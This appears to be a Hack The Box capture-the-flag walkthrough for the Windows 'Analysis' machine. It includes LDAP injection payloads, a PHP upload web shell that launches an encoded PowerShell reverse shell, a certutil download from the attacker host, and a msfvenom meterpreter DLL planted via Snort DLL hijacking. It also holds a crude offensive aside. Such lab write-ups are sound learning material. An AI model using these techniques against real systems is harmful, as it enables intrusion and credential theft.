🔎ANALYSIS
Welcome to the formidable challenge of the "Analysis" box on Hack The Box (HTB), a hard-level Windows-based puzzle in this Open Beta 4 edition.

Hacking Phases for Analysis HTB:
Information Gathering
Enumeration web services
Analysis web vulnerabilities
Gain web shell
Lateral movement
PrivEsc
I => Information Gathering
Initial Reconnaissance
Begin with a comprehensive nmap
scan to identify active ports and services on the "Analysis" box.
Command:
nmap -sC -sV -O -T4 --min-rate=500 -oA nmap/analysis 10.10.11.250
Result Snapshot:
Host Response: 10.10.11.250 is up (Latency: 0.26s).
Majority of TCP Ports: Closed.
Open Ports and Services:
53/tcp: Domain (Simple DNS Plus)
80/tcp: HTTP (Microsoft HTTPAPI httpd 2.0)
88/tcp: Kerberos Security (Microsoft Windows Kerberos)
135/tcp: Microsoft Windows RPC
139/tcp: NetBIOS Session (Microsoft Windows netbios-ssn)
389/tcp: LDAP (Microsoft Windows Active Directory LDAP)
445/tcp: Microsoft Directory Services
464/tcp: kpasswd5
593/tcp: Microsoft Windows RPC over HTTP
636/tcp, 3269/tcp: TCP Wrapped
3268/tcp: LDAP (Microsoft Windows Active Directory LDAP)
3306/tcp: MySQL (unauthorized)
OS Detection: Inconclusive (Potential Windows OS)
Host Script Results:
SMB2 Protocol Negotiation Failed
Analysis: The scan reveals a typical Windows domain environment with services like Kerberos, LDAP, and Microsoft RPC. The unusual presence of a MySQL server and failed SMB2 negotiation suggest potential avenues for exploration.
Next Steps:
DNS Mapping: Add
analysis.htb
to/etc/hosts
.Web Application Assessment: Explore the web application on port 80 for vulnerabilities.
Service Exploration: Investigate LDAP, Kerberos, and SMB services.
II => HTTP Enumeration && Exploitation
Objective: Uncover web applications for initial access or crucial information.
After reviewing the http://analysis.htb/
, which appears to be static, I started digging for any leads to begin my exploration.

Tools & Techniques:
DNS Enumeration:
Utilizing tools like
dnsenum
,gobuster
, and custom bash scripts.
Commands Used:
dnsenum: Enumerates DNS details.
dnsenum --dnsserver 10.10.11.250 --enum -p 0 -s 0 -o out.txt -f wordlist.txt analysis.htb
Gobuster: Brute-forces DNS subdomains.
gobuster dns -d analysis.htb -w wordlist.txt -r 10.10.11.250
Bash Script: Queries for subdomains.
for sub in $(cat wordlist.txt); do
dig $sub.analysis.htb @10.10.11.250 | grep -v ';\|SOA' | sed -r '/^\s*$/d' | grep $sub | tee -a out.txt
done
Outcome & Analysis:
The goal is to discover subdomains associated with additional services or web applications.
Next Steps:
Investigate discovered subdomains.
Note
internal.analysis.htb
for further exploration.
It's seems like the main page just 403
If we try to go any DIR we will have 404
. Use dirsearch
to scan internal.analysis.htb
for hidden DIRS/PHP files.
Visual Insight:


As we see we didn't find kosom Israel.
Uncovering Hidden Gems
dirsearch -q -r -u http://internal.analysis.htb/ -i 200,300-399 -e php
Findings: Discovered several directories and files including login and user list endpoints.
After extensive search, focus shifted to LDAP injection due to the results from nmap.
Visual Evidence:

Parameters Fuzzing:
Found
name
ffuf -c -v -w parameters.txt -u "http://internal.analysis.htb/users/list.php?FUZZ=test"
I discovered
name
is vulnerable to LDAP injection
Uncovering LDAP Injection
Parameter Identification:
During the exploration of
http://internal.analysis.htb/users/list.php
, thename
parameter was identified.A critical observation was made that the
name
parameter was susceptible to LDAP injection.
Exploiting LDAP Injection:
A series of rigorous fuzzing exercises were conducted on the
name
parameter.The tools and techniques employed revealed two significant LDAP attributes:
objectclass
anddescription
.The successful LDAP query structure was identified as
url?name=*)(%26(FUZZING=*)
url?name=*)(%26(objectClass=*)(FUZZING=*)
url?name=*)(%26(objectClass=*)(description=*)
# I think the full query like this
(&(name=*)(objectClass=*)(description=*))
Intriguingly, the
objectClass
attribute consistently held the valueuser
, and thedescription
attribute contained a lengthy string, interpreted as the password for thetechnician
user.
To further exploit this discovery, a specialized script was utilized, significantly enhanced and optimized for this specific scenario. This custom script, available on Hunt3r0x's GitHub, was pivotal in extracting the complete password.
Script Usage:
python3 fuzzer.py --charset allchars-wordlist.txt

When i have creds in windows ENV i start for enumerate for creds validity for most common protocols.
User Enumeration:
Employed
kerbrute
for user enumeration with discovered credentials.
# Warping users with DC 'analysis.htb'
sed -i "s|$|@analysis.htb|" users.txt
# Then
kerbrute userenum -d analysis.htb users.txt --dc analysis.htb
Found several users, including
technician
.
Kerbrute Output:

Protocols Enumeration:
Used
crackmapexec
to enumerate protocols withtechnician
credentials.
crackmapexec <$PROTOCOL> 10.10.11.250 -u 'technician' -p 'password'
for protocol in mssql smb ldap ftp winrm ssh rdp;do crackmapexec $protocol 10.10.11.250 -u 'technician' -p 'password';done
Nothing we found.
Web Login:
Successfully logged in using discovered credentials at
http://internal.analysis.htb/employees/login.php
.
Exploiting File Upload
Found and exploited a file upload function in the admin panel.
Uploading testing PHP code.
<?php echo "<h1>HELLO \;</h1>";?>

It's worked:

Gaining reverse shell
// Uplaod this but make sure you put ur PS script
<?php system("powershell -e <PS script encoded with BASE64>")?>
// You can use https://www.revshells.com/
And fire up your netcat and visit the uploaded shell.

netcat
rlwrap -cAr nc -lvnp <PORT>
reverse shell Gained shell access as svc_web
. And the user flag was in owned by jdoe
user.

III => Privilege Escalation
Objective: To escalate privileges and gain higher level access on the system.
Techniques & Tools:
Initial Lateral Movement:
Initially gained shell access as
svc_web
.The user flag was under
jdoe
's ownership.
PowerShell Script for Privilege Escalation:
Utilized the PrivescCheck PowerShell script. Upload the PS script to the machine
# First
## In your terminal
wget https://raw.githubusercontent.com/itm4n/PrivescCheck/master/PrivescCheck.ps1
## And then open HTTP server
python3 -m http.server <PORT>
# Second
## In gained shell
certutil -urlcache -f http://<TUN0>:<PORT>/PrivescCheck.ps1 PrivescCheck.ps1
Executed the script with:
powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck -Extended -Report PrivescCheck_$($env:COMPUTERNAME) -Format HTML"
Discovered leaked credentials for
jdoe
in the winlogon registry key.

Credential Validation with CrackMapExec:
Validated the discovered credentials using CrackMapExec.
crackmapexec <PROTOCOL> 10.10.11.250 -u 'user' -p 'password'
for protocol in mssql smb ldap ftp winrm ssh rdp;do crackmapexec $protocol 10.10.11.250 -u 'user' -p 'password';done
Confirmed the credentials' validity over the WinRM protocol.

Accessing jdoe's Account with Evil-WinRM:
Gained access to
jdoe
account using Evil-WinRM:
evil-winrm -i 10.10.11.250 -u "jdoe" -p "password"
Successfully retrieved the user flag

I really nooob in windows PrivEsc so after long day with mess and cyber community tips I got this:
Exploiting CVE-2016-1417 for Administrator Access:
Identified the machine's vulnerability to CVE-2016-1417 (DLL hijacking in Snort 2.9.7.0-WIN32).
Created a DLL payload with msfvenom:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=tun0 LPORT=1337 -f dll > tcapi.dll
Set up a listener in Metasploit:
msfconsole
use multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost TUN0
set lport 1337
run
Uploaded
tcapi.dll
toC:\snort\lib\snort_dynamicpreprocessor
usingjdoe
's shell in Evil-WinRM.
upload tcapi.dll tcapi.dll # In Evil-WinRM
## If you got no access try to remove .dll files with
dell *.dll
## Then
upload tcapi.dll tcapi.dll
WE IN /;

Successfully executed the DLL payload, exploiting the vulnerability.
Gained a Meterpreter shell with administrative access through DLL hijacking.
ANOTHER${IFS}SHITY${IFS}THING<<<SEE${IFS}YOU/:
Last updated
Was this helpful?